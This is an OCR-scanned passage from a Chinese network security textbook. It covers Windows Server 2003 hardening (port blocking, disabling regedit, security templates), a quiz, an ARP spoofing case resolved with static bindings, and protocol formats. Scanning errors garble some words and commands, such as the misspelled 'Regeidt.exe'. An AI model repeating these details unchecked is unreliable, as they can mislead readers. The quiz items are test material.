图 2-45 “IP 筛选 器 属性 "对话 框 (2) 图 2-46 “新 规则 属性 "对话 框 (2) 


图 2-49 “新 规则 属性 ”对 话 框 (3) 图 2-50 “我 的 安全 策略 属性 "对话 框 (2) 
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步骤 14: 在 “本 地 安全 设置 "窗口 中 , 右 击 新 添加 的 “我 的 安全 策略 ”选项 ,在 弹出 的 快捷 
菜单 中 选择 “指派 ”命令 ,如 图 2-51 所 示 。 

重新 启动 计算 机 后 ,上 述 网 络 端口 就 被 关闭 了 ,病毒 和 黑客 再 也 不 能 连 上 这 些 端口 ,从 
而 保护 了 计算 机 的 安全 。 
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图 2-51 “本 地 安全 设置 "窗口 (2) 


2.4.5 任务 5: 禁 用 注册 表 编 辑 器 


1. 任务 目标 


(1) 了 解 操作 系统 注册 表 的 作用 。 
(2) 掌握 注册 表 编辑 器 的 禁用 方法 。 


2. 完成 任务 所 需 的 设备 和 软件 
装 有 Windows Server 2003 操作 系统 的 PC 1 台 ,或 Windows Server 2003 虚拟 机 1 台 。 


3. 任务 实施 步骤 


注册 表 是 Microsoft Windows 中 的 一 个 重要 的 数据 库 , 用 于 存储 系统 和 应 用 程序 的 设 
置信 息 。Regedit. exe 是 微软 提供 的 一 个 编辑 注册 表 的 工具 .是 所 有 Windows 系统 通用 的 
注册 表 编辑 工具 。Regedit. exe 可 以 进行 添加 修改 注册 表 主 键 , 修 改 键 值 .备份 注册 表 、 局 部 
导入 导出 注册 表 等 操作 。 

Windows 操作 系统 安装 完成 后 ,默认 情况 下 Regedit. exe 可 以 任意 使 用 ,为 了 防止 非 网 
络 管理 人 员 恶 意 使 用 ,应 禁止 Regedit. exe 的 使 用 。 

步骤 1: 选择 “开始 ”>“ 运 行 ”命令 ,打开 “运行 ”对 话 框 .在 对 话 框 的 “打开 ”文本 框 中 输 
入 gpedit. msc 命令 ,然后 单 击 “ 确 定 ” 按 钮 .打开 “组 策略 编辑 器 "窗口 。 

步骤 2: 在 窗口 的 左 侧 窗 格 中 :选择 “本 地 计算 机 ?策略 ”用户 配置 ”一 “管理 模板 ”一 
“系统 ”选项 ,如 图 2-52 所 示 。 
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图 2-52 “组 策略 编辑 器 ”窗口 


步骤 3: 然后 在 右 侧 窗 格 中 找到 并 双击 “阻止 访问 注册 表 编 辑 工具 ”选项 ,打开 “阻止 访 
问 注册 表 编 辑 工具 属性 ”对 话 框 ,选中 “已 启用 ” 单 选 按钮 ,如 图 2-53 所 示 , 单 击 * 确 定 ”按钮 
返回 “组 策略 编辑 器 "窗口 。 

步骤 4: 选择 “开始 ”>“ 运 行 "命令 ,打开 “运行 "对 话 框 ,在 对 话 框 的 “打开 ”文本 框 中 输 
人 Regeidt. exe 命令 ,然后 单 击 “ 确 定 ” 按 钮 ,系统 将 会 提示 “注册 表 编 辑 已 被 管理 员 禁 用 ” 信 
息 , 如 图 2-54 所 示 。 
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图 2-53 “阻止 访问 注册 表 编 辑 工具 属性 ?对话 框 图 2-54 禁用 注册 表 编辑 器 警告 信息 


25 拓展 提高 : Windws 系统 的 安全 模板 


1. 什么 是 安全 模板 
安全 模板 是 由 Windows Server 2003 支持 的 安全 属性 的 文件 (. inf) 组 成 的 。 安 全 模板 
55 


网 络 安全 技术 项 目 化 教程 


将 所 有 的 安全 属性 组 织 到 一 个 位 置 , 以 简化 安全 性 管理 。 安 全 模板 包含 了 安全 性 信息 账户 
策略 .本 地 策略 .事件 日 志 、 受 限制 的 组 ,系统 服务 .注册 表 、 文 件 系统 7 类 。 安 全 模板 也 可 以 
用 作 安 全 分 析 。 通 过 使 用 安全 模板 管理 单元 ,可 以 创建 对 网 络 或 计算 机 的 安全 策略 。 安 全 
模板 是 代表 安全 配置 的 文本 文件 ,将 其 应 用 于 本 地 计算 机 、 导 入 组 策略 或 使 用 安全 模板 来 分 
析 安 全 性 。 


2. 预定 义 的 安全 模板 


预定 义 的 安全 模板 是 作为 创建 安全 策略 的 初始 点 而 提供 的 ,这 些 策略 都 经 过 自 定义 
设置 以 满足 不 同 的 组 织 要 求 。 可 以 使 用 安全 模板 管理 单元 对 模板 进行 自 定义 设置 。 一 
且 对 预定 义 的 安全 模板 进行 了 自 定 义 设置 ,就 可 以 用 这 些 模板 配置 单 台 或 数 千 台 计算 机 
的 安全 性 。 可 以 使 用 安全 配置 和 分 析 管 理 单元 、Secedit. exe 命令 提示 符 工具 或 将 模板 导 
入 本 地 安全 策略 中 来 配置 单 台 计算 机 。 在 Windows Server 2003 中 预定 义 的 安全 模板 
如 下 。 

(1) 默认 安全 设置 (setup security. inf) 。setup security. inf 代表 在 安装 操作 系统 期 间 
所 应 用 的 默认 安全 设置 ,其 中 包括 对 系统 驱动 器 的 根 目 录 的 文件 权限 。 此 模板 的 某 些 部 分 
可 应 用 于 故障 恢复 。 

(2) 兼容 (compatws. inf)。 工 作 站 和 服务 器 的 默认 权限 主要 授予 3 个 本 地 组 : 
Administrators\Power Users 和 Users。Administrators 享有 最 高 的 权限 ,而 Users 的 权限 
最 低 。 不 要 将 兼容 模板 应 用 到 域 控 制 器 。 

(3) 安全 (securex .inf) 。 安 全 模板 定义 了 至 少 可 能 影响 应 用 程序 兼容 性 的 增强 安全 
设置 。 例 如 ,安全 模板 定义 了 更 严密 的 密码 、 锁 定 和 审核 设置 。 

此 外 ,安全 模板 还 限制 了 LAN Manager 和 NTLM 身份 认证 协议 的 使 用 ,其 方式 是 将 
客户 端 配置 为 仅 可 发 送 NTLMv2 响应 ,而 将 服务 器 配置 为 可 拒绝 LAN Manager 的 响应 。 

安全 模板 细 分 为 securews. inf 和 securedc. inf。securews. inf 应 用 于 成 员 计 算 机 ， 
securedc. inf 应 用 于 服务 器 。 

(4) 高 级 安全 (hisec * .inf) 。 高 级 安全 模板 是 对 加 密 和 签名 做 进一步 限制 的 安全 模板 
的 扩展 集 ,这 些 加 密 和 签名 是 进行 身份 认证 和 保证 数据 通过 安全 通道 以 及 在 SMB 客户 机 
和 服务 器 之 间 进 行 安全 传输 所 必需 的 。 例 如 ,安全 模板 可 以 使 服务 器 拒绝 LAN Manager 
的 响应 ,而 高 级 安全 模板 则 可 以 使 服务 器 同时 拒绝 LAN Manager 和 NTLM 的 响应 。 安 全 
模板 可 以 启用 服务 器 端的 SMB 数据 包 签名 ,而 高 级 安全 模板 则 要 求 这 种 签名 。 此 外 ,高 级 
安全 模板 还 要 求 对 安全 通道 数据 进行 强力 加 密 和 签名 ,从 而 形成 域 到 成 员 以 及 域 到 域 的 信 
任 关 系 。 

高 级 安全 模板 细 分 为 hisecws. inf 和 hisecdc. inf。 一 般 ,hisecws. inf 应 用 于 普通 服务 
器 ,hisecdc. inf 应 用 于 域 控制 器 。 

(5) 系统 根 目 录 安 全 (rootsec. inf) 。rootsec. inf 可 以 指定 由 Windows Server 2003 所 
引入 的 新 的 根 目录 权限 。 默 认 情况 下 ,rootsec. inf 为 系统 驱动 器 根 目 录 定 义 这 些 权限 。 如 
果 不 小 心 更 改 了 根 日 录 权 限 , 则 可 以 利用 该 模板 重新 应 用 根 日 录 权限 ,或 者 通过 修改 模板 对 
其 他 卷 应 用 相同 的 根 目录 权限 。 
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3. 使 用 安全 模板 


运行 mmc. exe 命令 ,打开 控制 台 . 选 择 “ 文 件 ” 一 “添加 /删除 管理 单元 "命令 ,把 “安全 模 
板 ” 添 加 到 控制 台中 。 双 击 “ 安 全 模板 ”选项 ,可 以 看 到 几 个 预定 义 的 安全 模板 ,如 图 255 所 示 。 
这 些 模 板 保存 在 %systemroot%\security\templates 中 ,用 户 也 可 以 创建 包含 安全 设置 的 自 
定义 安全 模板 。 

双击 要 修改 的 安全 策略 ,根据 需要 进行 修改 后 , 右 击 已 修改 的 安全 配置 模板 的 名 称 , 然 
后 选择 “另存 为 "命令 ,新 建 一 个 模板 。 


口 控制 站 根 节点 
日 励 安全 模板 
日 CIO \secwrity\tenplates 
日 


empatvs 


26 习 题 
一 、 选 择 题 
1. 查看 端口 的 命令 是 。 
A. netstat B. ping C. route D. tracert 
2 是 一 种 登录 系统 的 方法 , 它 不 仅 绕 过 系统 已 有 的 安全 设置 ,而 且 还 能 挫败 
系统 上 的 各 种 增强 的 安全 设置 。 
A. 漏洞 B. 端口 C. 后 门 D. 服务 
3. 在 属性 对 话 框 中 ,可 以 设置 几 次 无 效 登 录 后 就 锁定 账户 。 
A. 账户 锁定 国 值 B. 密码 策略 
C. 账户 锁定 时 间 D. 复位 账户 锁定 计数 器 
4. 在 Windows Server 2003 用 户 “ 密 码 策略 ”设置 中 ,“ 密 码 必须 符合 复杂 性 要 求 " 策 略 
启用 后 ,用 户 设置 密码 时 必须 满足 要 求 。( 多 选 题 ) 


A. 必须 使 用 大 写字 母 .数字 、 小 写字 母 和 符号 中 的 3 种 
B. 密码 最 小 长 度 为 6 位 
C. 密码 中 不 得 包括 全 部 或 部 分 用 户 名 
D. 密码 长 度 没有 限制 
apy 
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5. Windows Server 2003 服务 器 可 以 采取 的 安全 措施 包括 。( 多 选 题 ) 
A. 使 用 NTFS 格式 的 磁盘 分 区 
B. 及 时 对 操作 系统 使 用 补丁 程序 堵塞 安全 漏洞 
C. 实行 强 有 力 的 安全 管理 策略 
D. 借助 防火 墙 对 服务 器 提供 保护 
E. 关闭 不 需要 的 服务 器 组 件 
二 、 简 答题 
1. 什么 是 操作 系统 的 安全 ? 其 主要 研究 什么 内 容 ? 
2. 简 述 操作 系统 账号 和 密码 的 重要 性 。 有 哪些 方法 可 能 保护 密码 而 不 被 轻易 破解 或 盗 取 ? 
3. 如 何 关 闭 不 需要 的 端口 和 服务 ? 
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31 项 目 提 出 


张 先生 在 企业 的 网 络 中 心 工作 ,负责 整个 企业 网 络 的 管理 和 维护 ,作为 网 络 管理 员 需 要 
时 刻 了 解 企业 网 络 流量 情况 ,并 对 网 络 流量 进行 监控 ,以 便 及 时 发 现 并 解决 可 能 出 现 的 网 络 
问题 。 最 近 有 多 位 企业 员工 反映 ,近期 访问 外 网 的 速度 时 快 时 人 慢 , 甚 至 不 能 访问 外 网 ,请 求 
网 络 中 心 给 予 解决 。 
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从 各 位 员工 反映 的 上 网 情况 来 看 ,网 速 变 慢 是 最 近 发 生 的 事情 ,近期 企业 内 部 没有 进行 
网 络 设备 的 调整 ,网 络 环境 没有 发 生变 化 ,网 络 应 用 也 没有 太 大 的 变化 ,这 应 该 是 网 络 中 有 
异常 流量 造成 的 。 

张 先生 经 过 调查 发 现 ,网 络 中 存在 以 下 网 络 故障 现象 。 

@o 某 部 门 的 所 有 计算 机 配置 相同 , 且 处 于 同一 个 网 段 , 唯 独 某 一 台 计算 机 无 法 上 网 ,而 
且 网 络 .网 络 接口 等 都 正常 ,该 计算 机 重新 启动 后 网 络 恢复 正常 ,过 一 段 时 间 后 ,网 络 又 瘫 
痪 了 。 

@ 网 络 中 的 计算 机 逐 台 掉 线 ,最 后 导致 全 部 计算 机 无 法 上 网 。 

@ 某 计 算 机 上 网 时 突然 掉 线 ,一会儿 又 恢复 了 ,但 恢复 后 上 网 一 直 很 慢 , 而 且 在 与 局 域 
网 内 的 其 他 计算 机 共享 文件 时 速度 也 变 慢 。 

@ 网 络 中 用 户 上 不 了 网 或 者 网 速 很 慢 。 

张 先生 用 网 络 监听 工具 Sniffer Pro 来 嗅 探 网 络 中 的 数据 包 , 发 现 网 络 中 存在 大 量 的 
ARP 数据 包 , 而 且 计 算 机 ARP 缓存 表 中 的 网 关 MAC 地 址 已 被 修改 ,导致 网 络 变 慢 甚 至 无 
法 上 网 ,这 就 是 典型 的 ARP 欺骗 攻击 。 

在 计算 机 中 利用 “ARP -s 网 关 IP 网 关 MAC” 命 令 静 态 设 置 正确 的 网 关 MAC 地 
址 ,在 网 关 ( 一 般 是 路 由 器 ) 中 对 局 域 网 内 的 主机 IP 地 址 与 其 相应 MAC 地 址 也 进行 静态 绑 
定 , 上 网 恢复 正常 。 
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33 相关 知识 点 


3.3.1 计算 机 网 络 体系 结构 


1. OSI 参考 模型 


在 计算 机 网 络 诞生 之 初 ,每 个 计算 机 厂商 都 有 一 套 自己 的 网 络 体系 结构 ,之 间 互 不 相 
容 。 为 此 ,国际 标准 化 组 织 (ISO) 在 1979 年 建立 了 一 个 分 委 会 来 专门 研究 一 种 用 于 开放 系 
统 互 联 的 体系 结构 , 即 OSI.“ 开 放 ” 这 个 词 表 示 :只 要 遵循 OSI 标准 ,一 个 系统 可 以 和 位 于 
世界 上 任何 地 方 的 ,也 遵循 OSI 标准 的 其 他 任何 系统 进行 连接 。 这 个 分 委 会 提出 了 开放 系 
统 互 联 参 考 模 型 , 即 OSI 参考 模型 (OSI/RM) . 它 定义 了 异类 系统 互联 的 标准 框架 。OSI/ 
RM 模型 分 为 7 层 , 从 下 往 上 分 别 是 物理 层 、 数 据 链 路 层 、 网 络 层 ,传输 层 、 会 话 层 、 表 示 层 和 
应 用 层 , 如 图 3-1 所 示 。 


物理 互联 媒体 


图 3-1 OSI/RM 模型 


计算 机 网 络 体系 结构 是 计算 机 网 络 层次 模型 和 各 层 协 议 的 集合 。 计 算 机 网 络 体系 结构 
是 抽象 的 ,而 实现 是 具体 的 ,是 能 够 运行 的 一 些 硬件 和 软件 ,多 采用 层次 结构 。 划 分 层次 的 
原则 如 下 。 

@ 网 中 各 节点 都 有 相同 的 层次 。 

@ 不 同 节 点 的 同等 层 具 有 相同 的 功能 。 

@@ 同一 节点 内 相 邻 层 之 间 通 过 接口 通信 。 

@ 每 一 层 使 用 下 层 提供 的 服务 .并 向 其 上 层 提供 服务 。 

回 不 同 节 点 的 同等 层 按照 协议 实现 对 等 层 之 间 的 通信 。 

下 面 介 绍 各 层 的 主要 功能 。 

@ 物理 层 。 这 是 整个 OSI 参考 模型 的 最 低层 . 它 的 任务 就 是 提供 网 络 的 物理 连接 。 所 
以 ,物理 层 是 建立 在 物理 介质 上 的 (而 不 是 逻辑 上 的 协议 和 会 话 ) , 它 提供 的 是 机 械 和 电气 接 
口 ,其 作用 是 使 原始 的 数据 比特 (Bit) 流 能 在 物理 媒体 上 传输 。 

加 数据 链 路 层 。 数 据 链 路 层 分 为 介质 访问 控制 (MAC) 子 层 和 人 逻辑 链 路 控制 (LLC) 子 
层 , 在 物理 层 提 供 比特 流传 输 服务 的 基础 上 ,传送 以 帧 为 单位 的 数据 。 数 据 链 路 层 的 主要 作 
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用 是 通过 校 验 、 确 认 和 反馈 重 发 等 手段 ,将 不 可 靠 的 物理 链 路 改造 成 对 网 络 层 来 说 无 差错 的 
数据 链 路 。 数 据 链 路 层 还 要 协调 收发 双方 的 数据 传输 速率 , 即 进行 流量 控制 ,以 防止 接收 方 
因 来 不 及 处 理发 送 方 来 的 高 速 数据 而 导致 缓冲 区 溢出 及 线路 阻塞 等 问题 。 

回 网 络 层 。 网 络 层 负责 由 一 个 站 到 另 一 个 站 间 的 路 径 选择 , 它 解决 的 是 网 络 与 网 络 之 
间 , 即 网 际 的 通信 问题 ,而 不 是 同一 网 段 内 部 的 事 。 网 络 层 的 主要 功能 是 提供 路 由 , 即 选择 
到 达 目 的 主机 的 最 佳 路 径 ,并 沿 该 路 径 传 送 数据 包 ( 分 组 ) 。 此 外 ,网 络 层 还 具有 流量 控制 和 
拥塞 控制 的 能 力 。 

@ 传输 层 。 传 输 层 负责 提供 两 站 之 间 数 据 的 传送 。 当 两 个 站 已 确定 建立 了 联系 后 , 传 
输 层 即 负责 监督 ,以 确保 数据 能 正确 无 误 的 传送 ,提供 可 靠 的 端 到 端 数据 传输 。 

回 会 话 层 。 会 话 层 主要 负责 控制 每 一 站 究竟 什么 时 间 可 以 传送 与 接收 数据 。 例 如 ,如 
果 有 许多 使 用 者 同时 进行 传送 与 接收 消息 ,此 时 会 话 层 的 任务 就 要 去 决定 是 要 接收 消息 或 
是 传送 消息 , 才 不 会 有 “碰撞 ”的 情况 发 生 。 

@ 表示 层 。 表 示 层 负责 将 数据 转换 成 使 用 者 可 以 看 得 向 的 有 意义 的 内 容 , 包 括 格式 转 
换 、 数 据 加 密 与 解密 .数据 压缩 与 恢复 等 功能 。 

@ 应 用 层 。 应 用 层 负 责 网 络 中 应 用 程序 与 网 络 操作 系统 间 的 联系 ,包括 建立 与 结束 使 
用 者 之 间 的 联系 ,监督 并 管理 相互 连接 起 来 的 应 用 系统 以 及 系统 所 用 的 各 种 资源 。 

数据 在 网 络 中 传送 时 ,在 发 送 方 和 接收 方 有 一 个 封装 和 解 封装 的 过 程 ,如 图 3-2 所 示 。 


图 3-2 数据 的 封装 和 解 封装 


@ 当 计算 机 A 上 的 应 用 进程 M 的 数据 传送 到 应 用 层 时 ,应 用 层 为 数据 加 上 本 层 控 制 
报头 后 ,组 成 应 用 层 的 服务 数据 单元 ,然后 再 传输 给 表示 层 。 

@ 表示 层 接 收 到 这 个 数据 单元 后 .加 上 本 层 的 控制 报头 .组 成 表示 层 的 服务 数据 单元 ， 
再 传送 给 会 话 层 ,以 此 类 推 ,数据 被 传送 到 传输 层 。 

@ 传输 层 接收 到 这 个 数据 单元 后 ,加 上 本 层 的 控制 报头 ,就 构成 了 传输 层 的 服务 数据 
单元 , 它 被 称 为 报 文 (Message) 。 

@ 传输 层 的 报 文 传送 到 网 络 层 时 ,由 于 网 络 层 数据 单元 的 长 度 限制 ,传输 层 长 报 文 将 
被 分 成 多 个 较 短 的 数据 段 , 加 上 网 络 层 的 控制 报头 ,就 构成 了 网 络 层 的 服务 数据 单元 , 它 被 
称 为 分 组 (Packet) 。 
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@ 网 络 层 的 分 组 传送 到 数据 链 路 层 时 ,加 上 数据 链 路 层 的 控制 信息 ( 帧 头 和 帧 尾 ) ,就 
构成 了 数据 链 路 层 的 服务 数据 单元 , 它 被 称 为 帧 (Frame) 。 

@ 数据 链 路 层 的 帧 传送 到 物理 层 后 ,物理 层 将 以 比特 流 的 方式 通过 传输 介质 传输 出 
去 。 当 比特 流 到 达 目 的 节点 计算 机 B 时 ,再 从 物理 层 依 层 上 传 ,每 层 对 各 层 的 控制 报头 进 
行 处 理 后 ,将 用 户 数 据 上 交 给 上 一 层 ,最 终 将 计算 机 A 的 应 用 进程 M 的 数据 传送 给 计算 机 
B 的 应 用 进程 N。 

尽管 应 用 进程 M 的 数据 在 OSI 环境 中 经 过 复杂 的 处 理 过 程 才能 被 送 到 另 一 台 计 算 机 
的 应 用 进程 N, 但 对 于 每 台 计算 机 的 应 用 进程 而 言 'OSI 环境 中 数据 流 的 复杂 处 理 过 程 是 透 
明 的 。 应 用 进程 M 的 数据 好 像 是 “直接 ”传送 给 应 用 进程 N, 这 就 是 开放 系统 在 网 络 通信 过 
程 中 最 本 质 的 作用 。 


2. TCP/IP 参考 模型 


建立 OSI 体系 结构 的 初衷 是 希望 为 网 络 通信 提供 一 种 统一 的 国际 标准 ,然而 其 固有 的 
复杂 性 等 缺点 制约 了 它 的 实际 应 用 。 一 般 而 言 , 由 于 OSI 体系 结构 具有 概念 清晰 的 优点 ， 
主要 适用 于 教学 研究 。 

ARPAnet 最 初 开发 的 网 络 协议 使 用 在 通信 可 靠 性 较 差 的 通信 子 网 中 , 且 出 现 了 不 少 问 
题 , 这 就 导致 了 新 的 网 络 协议 TCP/IP 的 产生 。 虽 然 TCP/IP 协议 不 是 OSI 标准 ,但 它 是 日 
前 最 流行 的 商业 化 的 网 络 协 议 ,并 被 公认 为 当前 的 工业 标准 或 “事实 上 的 标准 ”。 

TCP/IP 协议 具有 以 下 特点 。 

开放 的 协议 标准 ,独立 于 特定 的 计算 机 硬件 和 操作 系统 。 

@ 独立 于 特定 的 网 络 硬件 ,可 以 运行 在 局 域 网 .广域网 中 ,更 适用 于 互联 网 。 

@ 统一 的 地 址 分 配方 案 , 使 得 整个 TCP/IP 设备 在 网 中 都 具有 唯一 的 地 址 。 

@ 标准 化 的 高 层 协议 ,可 提供 多 种 可 靠 的 服务 。 

TCP/IP 参考 模型 分 为 4 层 :网 络 接口 层 、 互 联 层 (网 络 层 )、 传 输 层 和 应 用 层 。TCP/IP 
参考 模型 与 OSI 参考 模型 的 对 应 关系 如 表 3-1 所 示 。 


表 3-1 TCP/IP 参考 模型 与 OSI 参考 模型 的 对 应 关系 


OSI 参考 模型 TCP/IP 参考 模型 TCP/IP 常用 协议 
应 用 层 
表示 层 应 用 层 DNS.HTTP.SMTP.POP.Telnet\FTP.NFS 
会 话 层 
传输 层 传输 层 TCP.UDP 
网 络 层 互联 层 IP\ICMP IGMP、ARP、RARP 
数据 链 路 层 
网 络 接口 层 Ethernet .ATM.FDDI.ISDN TDMA 
物理 层 


TCP/IP 的 网 络 接口 层 实现 了 OSI 参考 模型 中 物理 层 和 数据 链 路 层 的 功能 。 
TCP/IP 的 互联 层 功 能 主要 体现 在 以 下 三 个 方面 。 
@ 处 理 来 自传 输 层 的 分 组 发 送 请 求 。 

62 


项 目 3 网 络 协议 与 分 析 


@ 处 理 接收 的 分 组 。 

@ 处 理 路 径 选 择 、 流 量 控制 与 拥塞 问题 。 

传输 层 实现 应 用 进程 间 的 端 到 端 通信 ,主要 包括 两 个 协议 :TCP 协议 和 UDP 协议 。 

TCP 协议 是 一 种 可 靠 的 面向 连接 的 协议 ,允许 将 一 台 主 机 的 字 节 流 无 差错 地 传送 到 目 
的 主机 。UDP 协议 是 不 可 靠 的 无 连接 协议 ,不 要 求 分 组 顺序 到 达 日 的 地 。 

应 用 层 的 主要 协议 有 :域名 系统 (DNS) 、 超 文本 传输 协议 (HTTP)、 简 单 邮件 传输 协议 
(SMTP) .邮局 协议 (POP) .远程 登录 协议 (Telnet) ,文件 传输 协议 (FTP)、 网 络 文件 协议 
(NFS) 等 。 


3.3.2 以 太 网 的 帧 格式 


1. Ethernet 地 址 


为 了 标识 以 太 网 上 的 每 台 主 机 ,需要 给 每 台 主机 上 的 网 络 适配器 (网 卡 ) 分 配 一 个 全 球 
唯一 的 通信 地 址 , 即 Ethernet 地 址 ,或 称 为 网 卡 的 物理 地 址 MAC 地址。 

IEEE 负责 为 网 络 适 配器 制造 厂商 分 配 Ethernet 地 址 块 , 各 厂商 为 自己 生产 的 每 块 网 
络 适配器 分 配 一 个 全 球 唯 一 的 Ethernet 地 址 。Ethernet 地 址 长 度 为 48 比特 , 共 6 字 节 ,如 
00-0D-88-47-58-2C ,其 中 ,前 3 字 节 为 IEEE 分 配给 厂商 的 厂商 代码 (00-0D-88) ,后 3 字 节 
为 厂商 自己 设置 的 网 络 适配器 编号 (47-58-2C)。MAC 广播 地 址 为 FF-FF-FF-FF-FF-FF。 
如 果 MAC 地 址 (二 进 制 ) 的 第 8 位 是 1, 则 表示 该 MAC 地 址 是 组 播 地 址 ,如 01-00-5E-37- 
55-4D。 


2. 以 太 网 的 帧 格式 


以 太 网 的 帧 是 数据 链 路 层 的 封装 形式 ,网 络 层 的 数据 包 被 加 上 帧 头 和 帧 尾 成 为 可 以 被 
数据 链 路 层 识别 的 数据 帧 (成 帧 )。 虽 然 帧 头 和 帧 尾 所 用 的 字 节 数 是 固定 不 变 的 ,但 依 被 封 
装 的 数据 包 大 小 的 不 同 , 以 太 网 的 帧 长 度 也 在 变化 ,其 范围 是 64 一 1518 字 节 (不 算 8 字 节 的 
前 导 字 )。 

以 太 网 的 帧 格式 有 多 种 ,在 每 种 格式 的 帧 开始 处 都 有 64 比特 (8 字 节 ) 的 前 导 字符 ,其 
中 前 7 字 节 为 前 同步 码 (7 个 10101010) ,第 8 字 节 为 帧 起 始 标志 (10101011)。 如 图 3-3 所 
示 为 Ethernet 下 的 帧 格式 (未 包括 前 导 字 符 ) 。 


目的 MAC 地 址 源 MAC 地 址 类 型 数据 FCS 
(6 字 节 ) (6 字 节 ) 〈2 字 节 ) (46 一 1500 字 节 ) (4 字 节 ) 


图 3-3 Ethernet 工 的 帧 格式 


Ethernet [类 型 以 太 网 帧 的 最 小 长 度 为 64 字 节 (6 十 6 十 2 十 46 十 4) ,最 大 长 度 为 1518 字 节 

(6 十 6 十 2 十 1500 十 4)。 其 中 前 12 字 节 分 别 标识 出 发 送 数 据 帧 的 源 节点 MAC 地 址 和 接收 
数据 帧 的 目标 节点 MAC 地 址 。 接 下 来 的 2 字 节 标识 出 以 太 网 帧 所 携带 的 上 层 数 据 类 型 ， 
如 十 六 进 制 数 0x0800 代表 IP 协议 数据 ,如 十 六 进 制 数 0x0806 代表 ARP 协议 数据 等 。 在 
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不 定 长 的 数据 字段 后 是 4 字 节 的 帧 校 验 序列 (Frame Check Sequence,FCS) ,采用 32 位 
CRC 循环 宛 余 校 验 , 对 从 * 目 的 MAC 地 址 ”字段 到 “数据 ”字段 的 数据 进行 校 验 。 


3.3.3 网 络 层 协议 格式 


网 络 层 的 协议 主要 有 IP 协议 .ARP 协议 和 ICMP 协议 。 
1. IP 数据 报 格式 


IP 数据 报 分 为 两 大 部 分 : 报 文 头 和 数据 区 ,其 中 报 文 头 仅仅 是 正确 传输 高 层 ( 即 传输 
层 ) 数 据 而 增加 的 控制 信息 ,数据 区 包括 高 层 需要 传输 的 数据 。 
IPv4 数据 报 格式 如 图 3-4 所 示 。 


比特 0 4 8 16 19 24 31 


图 3-4 ”IPv4 数据 报 格式 


各 字段 的 含义 如 下 。 

(1) 版 本 。 占 4 位, 指 IP 协议 版 本 号 (一 般 是 4, 即 IPv4) ,不 同 IP 版 本 规定 的 数据 格式 
不 同 。 

(2) 报头 长 度 。 占 4 位 ,指数 据 报 报头 的 长 度 。 以 32 位 ( 即 4 字 节 ) 为 单位 , 当 报头 中 
无 可 选项 时 ,报头 的 基本 长 度 为 5( 即 20 字 节 )。 

(3) 服务 类 型 。 占 8 位 ,包括 一 个 3 位 长 度 的 优先 级 ,4 个 标志 位 D( 延 迟 )、T( 香 吐 
量 ) .R( 可 靠 性 ) 和 CC 代价 ), 另 外 一 位 未 用 。 

(4) 总 长 度 。 占 16 位 ,数据 报 的 总 长 度 ,包括 头 部 和 数据 ,以 字 节 为 单位 。 

(5) 标识 。 占 16 位 , 源 主机 赋予 IP 数据 报 的 标识 符 , 目 的 主机 利用 此 标识 判断 此 分 片 
属于 哪个 数据 报 .以 便 重组 。 

当 IP 分 组 在 网 上 传输 时 ,可 能 要 跨越 多 个 网 络 , 但 每 个 网 络 都 规定 了 一 个 帧 最 多 携带 
的 数据 量 (此 限制 称 为 最 大 传输 单元 MTU) , 当 长 度 超过 MTU 时 ,就 需要 将 数据 分 成 若干 
个 较 小 的 部 分 (分 片 ) ,然后 独立 发 送 。 目 的 主机 收 到 分 片 后 的 数据 报 后 ,对 分 片 再 重新 组 装 
(重组 ) 。 

(6) 标志 。 占 3 位 ,告诉 目的 主机 该 数据 报 是 否 已 经 分 片 , 是 否 是 最 后 的 分 片 。 
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(7) 片 偏 移 。 占 13 位 ,本 片 数据 在 初始 IP 数据 报 中 的 位 置 , 以 8 字 节 为 单位 。 

(8) 生存 时 间 CTTL)。 占 8 位 ,设计 一 个 计数 器 , 当 计 数 器 值 为 0 时 ,数据 报 被 删除 , 避 
免 循 环 发 送 。 

(9) 协议 类 型 。 占 8 位 ,指示 数据 报 携带 的 数据 是 使 用 何 种 协议 ,以 便 使 日 的 主机 的 IP 
层 知 道 应 将 数据 部 分 上 交 给 哪个 处 理 过 程 ,如 TCP(06)、UDP(17) ICMP(01) 等 。 

(10) 首部 校 验 和 。 占 16 位 ,只 校 验 数据 报 的 报头 .不 包括 数据 部 分 。 

(11) IP 地 址 。 各 占 32 位 的 源 IP 地 址 和 目的 IP 地 址 分 别 表 示 数 据 报 发 送 者 和 接收 者 
的 IP 地 址 ,在 整个 数据 报 传输 过 程 中 ,此 两 字段 的 值 一 直 保持 不 变 。 

(12) 可 选 字段 (长 度 可 变 ) 。 主 要 用 于 控制 和 测试 两 大 目的 。 既 然 是 选项 ,用 户 可 以 使 
用 IP 选项 也 可 以 不 使 用 IP 选项 ,但 实现 IP 协议 的 设备 必须 能 处 理 IP 选项 。 在 使 用 选项 
的 过 程 中 ,如 果 造 成 IP 数据 报 的 报头 不 是 32 位 的 整数 倍 ,这 时 需要 使 用 “填充 "字段 凑 齐 。 

IP 选项 主要 有 以 下 3 个 选项 。 

@ 源 路 由 。 指 IP 数据 报 穿越 互联 网 所 经 过 的 路 径 是 由 源 主机 指定 。 包 括 严格 路 由 选 
项 和 松散 路 由 选项 。 严 格 路 由 选项 规定 IP 数据 报 要 经 过 路 径 上 的 每 一 台 路 由 器 , 相 邻 的 路 
由 器 之 间 不 能 有 中 间 路 由 器 ,并 且 经 过 的 路 由 器 的 顺序 不 能 改变 。 松 散 路 由 选项 给 出 数据 
报 必须 经 过 的 路 由 器 列表 ,并且 要 求 按照 列表 中 的 顺序 前 进 ,但 是 ,在 途中 也 允许 经 过 其 他 
的 路 由 器 。 

@ 记录 路 由 。 记 录 IP 数据 报 从 源 主机 到 目的 主机 所 经 过 的 路 径 上 各 台 路 由 器 的 IP 
地 址 ,用 于 测试 网 络 中 路 由 器 的 路 由 配置 是 否 正确 。 

@ 时 间 戳 。 记 录 IP 数据 报 经 过 每 一 台 路 由 器 时 的 时 间 ( 以 ms 为 单位 ) 。 


2. ARP 数据 报 格式 


利用 ARP(Address Resolution Protocol, 地 址 解析 协议 ) 就 可 以 由 IP 地 址 得 知 其 物理 
地 址 (MAC 地 址 )。 以 太 网 协议 规定 ,同一 局 域 网 中 的 一 台 主 机 要 和 另 一 台 主 机 进行 直接 
通信 ,必须 知道 目的 主机 的 MAC 地 址 。 而 在 TCP/IP 协议 中 .网 络 层 和 传输 层 只 关心 目的 
主机 的 IP 地 址 ,这 就 导致 在 以 太 网 中 使 用 IP 协议 时 ,数据 链 路 层 的 以 太 网 协议 接 到 的 上 层 
IP 协议 提供 的 数据 中 ,只 包含 日 的 主机 的 IP 地 址 。 于 是 需要 一 种 方法 ,根据 日 的 主机 的 IP 
